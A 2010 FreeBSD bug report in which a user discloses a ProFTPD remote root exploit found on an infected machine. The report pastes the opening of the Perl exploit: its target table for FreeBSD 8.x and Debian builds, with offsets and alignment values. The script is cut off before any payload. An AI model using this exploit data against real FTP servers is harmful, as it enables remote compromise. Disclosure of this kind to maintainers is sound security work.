misc/152100: found an exploit on freebsd, "known to work", in an infected (linux) machine
Michel van Gruijthuijsen
mistige at gmail.com
Wed Nov 10 09:20:09 UTC 2010
>Number: 152100
>Category: misc
>Synopsis: found an exploit on freebsd, "known to work", in an infected (linux) machine
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Wed Nov 10 09:20:08 UTC 2010
>Closed-Date:
>Last-Modified:
>Originator: Michel van Gruijthuijsen
>Release: 8.x is at least one of the targeted.
>Organization:
-
>Environment:
>Description:
#!/usr/bin/perl
# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope
use IO::Socket;
$numtargets = 13;
@targets =
(
# Plain Stack Smashing
#Confirmed to work
["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
"FreeBSD", # OPERATING SYSTEM
0, # EXPLOIT STYLE
0xbfbfe000, # OFFSET START
0xbfbfff00, # OFFSET END
1029], # ALIGN
#Confirmed to work
["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
"FreeBSD",
0,
0xbfbfe000,
0xbfbfff00,
1021],
# Return into Libc
#Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1, # EXPLOIT STYLE
0x0804CCD4, # write(2) offset
8189, # ALIGN
0], # PADDING
[.....], I can send you the whole thing if you want.
>How-To-Repeat:
It's an exploit.
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted: